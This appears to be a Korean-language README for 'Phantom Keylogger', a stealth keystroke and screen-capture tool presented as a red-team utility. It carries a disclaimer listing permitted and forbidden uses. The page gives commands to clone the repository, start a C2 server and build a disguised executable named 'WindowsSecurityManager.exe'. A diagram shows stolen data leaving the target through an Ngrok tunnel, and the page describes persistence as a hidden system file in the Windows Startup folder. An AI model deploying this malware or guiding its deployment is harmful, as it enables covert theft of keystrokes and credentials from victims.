
Phantom Keylogger는 고급의 스텔스 기능을 갖춘 키 입력 및 시각적 정보 수집 시스템입니다.
Phantom Keylogger는 고급 스텔스 기능을 갖춘 키스트로크 및 시각 정보 수집 시스템입니다. 운영 보안을 최우선 목표로 구축된 이 도구는 공인된 레드팀 작전 중 대상 시스템에 최소한의 흔적을 남기면서 지속적인 감시 기능을 제공합니다.
승인된 사용 사례:
- 공인된 침투 테스트 작업
- 서면 교전 규칙(Rules of Engagement)을 갖춘 레드팀 훈련
- 통제된 환경에서의 보안 연구
- 방어 보안 통제 검증
금지된 작업:
- 허가되지 않은 감시 활동
- 불법 침입 또는 데이터 유출
- 개인 사생활 침해
- 승인되지 않은 모든 공격적 작전
운영자는 적절한 배포에 대한 전적인 법적 책임을 집니다
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
출력: dist/WindowsSecurityManager.exe
전달 방법:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
시작 폴더: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
대화 상자(WIN+r)에 shell:startup을 입력하면 쉽게 접근할 수 있습니다.
파일 이름: WindowsSecurityManager.exe
속성: 숨김 시스템 파일